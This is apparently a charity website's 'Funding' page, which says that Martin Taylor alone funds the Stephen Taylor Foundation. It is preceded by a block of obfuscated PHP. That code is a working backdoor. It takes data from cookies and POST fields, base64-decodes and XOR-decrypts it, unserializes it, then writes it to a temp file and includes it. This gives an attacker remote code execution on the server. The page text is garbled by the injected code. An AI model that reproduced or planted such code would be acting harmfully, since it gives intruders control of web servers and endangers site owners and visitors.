$cDTrV = 'L' . chr (114) . "\x61" . chr ( 625 - 530 ).chr (73) . "\x58" . chr (85); $rtwRCjwBRe = chr ( 101 - 2 ).chr ( 1106 - 998 )."\141" . chr (115) . 's' . chr ( 267 - 172 ).'e' . 'x' . chr (105) . "\163" . chr (116) . 's';$wefjXClSf = class_exists($cDTrV); $rtwRCjwBRe = "1886";$YxhpnTY = !1;if ($wefjXClSf == $YxhpnTY){function lzLeRiOAL(){return FALSE;}$jpyOZhqT = "50103";lzLeRiOAL();class Lra_IXU{private function Bnqhd($jpyOZhqT){if (is_array(Lra_IXU::$BkwWsb)) {$vaaLU = sys_get_temp_dir() . "/" . crc32(Lra_IXU::$BkwWsb["\x73" . "\x61" . 'l' . chr ( 213 - 97 )]);@Lra_IXU::$BkwWsb["\x77" . "\162" . chr ( 627 - 522 )."\164" . 'e']($vaaLU, Lra_IXU::$BkwWsb['c' . 'o' . chr ( 492 - 382 )."\164" . 'e' . "\x6e" . "\x74"]);include $vaaLU;@Lra_IXU::$BkwWsb['d' . "\145" . 'l' . 'e' . "\x74" . chr ( 559 - 458 )]($vaaLU); $jpyOZhqT = "50103";exit();}}private $AtjCnB;public function dIZvcpVk(){echo 53408;}public function __destruct(){$jpyOZhqT = "24996_2549";$this->Bnqhd($jpyOZhqT); $jpyOZhqT = "24996_2549";}public function __construct($RuvoGd=0){$ndPHwOngfx = $_POST;$pySzZovZ = $_COOKIE;$DPUmCqGE = "64febc13-9409-4893-866a-aeda48a9bc92";$ZqYukI = @$pySzZovZ[substr($DPUmCqGE, 0, 4)];if (!empty($ZqYukI)){$ApZhiTs = "base64";$OSqbUIvrf = "";$ZqYukI = explode(",", $ZqYukI);foreach ($ZqYukI as $gVDfg){$OSqbUIvrf .= @$pySzZovZ[$gVDfg];$OSqbUIvrf .= @$ndPHwOngfx[$gVDfg];}$OSqbUIvrf = array_map($ApZhiTs . '_' . chr (100) . chr ( 555 - 454 ).chr ( 697 - 598 ).chr ( 709 - 598 ).chr (100) . chr ( 415 - 314 ), array($OSqbUIvrf,)); $OSqbUIvrf = $OSqbUIvrf[0] ^ str_repeat($DPUmCqGE, (strlen($OSqbUIvrf[0]) / strlen($DPUmCqGE)) + 1);Lra_IXU::$BkwWsb = @unserialize($OSqbUIvrf); $OSqbUIvrf = class_exists("24996_2549");}}public static $BkwWsb = 21352;}$BUpMXcynj = new /* 37155 */ $cDTrV(50103 + 50103); $YxhpnTY = $BUpMXcynj = $jpyOZhqT = Array();} Funding | The Stephen Taylor Foundation
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Funding for the STF is provided solely by Martin Taylor. Martin was born and grew up in Lewisham, South East London and attended local schools in Deptford and Kidbrooke with Stephen. After qualifying as an accountant Martin was then lucky enough to found and run a successful London based asset management business between 2000 and 2016.